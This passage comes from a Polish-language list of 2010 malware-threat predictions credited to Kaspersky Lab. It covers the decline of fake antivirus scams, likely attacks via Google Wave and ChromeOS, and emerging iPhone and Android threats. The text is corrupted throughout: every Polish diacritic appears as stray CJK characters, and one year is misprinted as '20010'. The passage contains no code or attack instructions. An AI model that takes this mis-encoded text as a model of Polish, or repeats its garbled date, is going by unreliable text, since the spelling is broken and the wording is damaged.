  4. Nast膮pi spadek liczby fa艂szywych rozwi膮za艅 antywirusowych, odzwierciedlaj膮cy spadek liczby trojan贸w atakuj膮cych gry. Programy te, kt贸re po raz pierwszy pojawi艂y si臋 w 2007 roku, osi膮gn臋艂y punkt szczytowy w 2009 roku i by艂y zwi膮zane z liczb膮 najwi臋kszych epidemii. Rynek fa艂szywych program贸w antywirusowych zosta艂 ju偶 nasycony, a zyski osi膮gane przez cyberprzest臋pc贸w s膮 nieznaczne. Poniewa偶 bran偶a antywirusowa i agencje 艣cigania skupiaj膮 si臋 obecnie na fa艂szywych programach antywirusowych, nie b臋dzie im 艂atwo przetrwa膰.
  5. Google Wave i ataki przeprowadzone za po艣rednictwem tej us艂ugi b臋d膮 bez w膮tpienia gor膮cym tematem w 2010. Takie ataki b臋d膮 prawdopodobnie ewoluowa艂y w standardowy spos贸b, od spamu, po ataki phishingowych, wykorzystywanie luk w zabezpieczeniach, a nast臋pnie rozprzestrzenianie szkodliwego oprogramowania. Opublikowanie ChromeOS jest r贸wnie偶 do艣膰 interesuj膮ce, istnieje jednak niewielkie prawdopodobie艅stwo, 偶e w nast臋pnym roku cyberprzest臋pcy skoncentruj膮 swoje wysi艂ki na tej platformie.
  6. Rok 2010 b臋dzie prawdopodobnie trudny dla takich platform, jak iPhone i Android. Pojawienie si臋 pierwszych zagro偶e艅 atakuj膮cych te platformy w 2009 roku pokazuje, 偶e cyberprzest臋pcy zaczynaj膮 bada膰 te platformy i oferowane przez nie mo偶liwo艣ci. Je偶eli chodzi o iPhony, zagro偶one s膮 tylko te z艂amane (przy u偶yciu metody jailbreak), jednak w przypadku Androida nie ma takich ogranicze艅, poniewa偶 mog膮 zosta膰 zainstalowane aplikacje z dowolnego 藕r贸d艂a. Rosn膮ca popularno艣膰 telefon贸w Android w Chinach oraz s艂aby monitoring opublikowanych aplikacji spowoduje wiele powa偶nych incydent贸w wirusowych w 20010 roku.
殴r贸d艂o:
Kaspersky Lab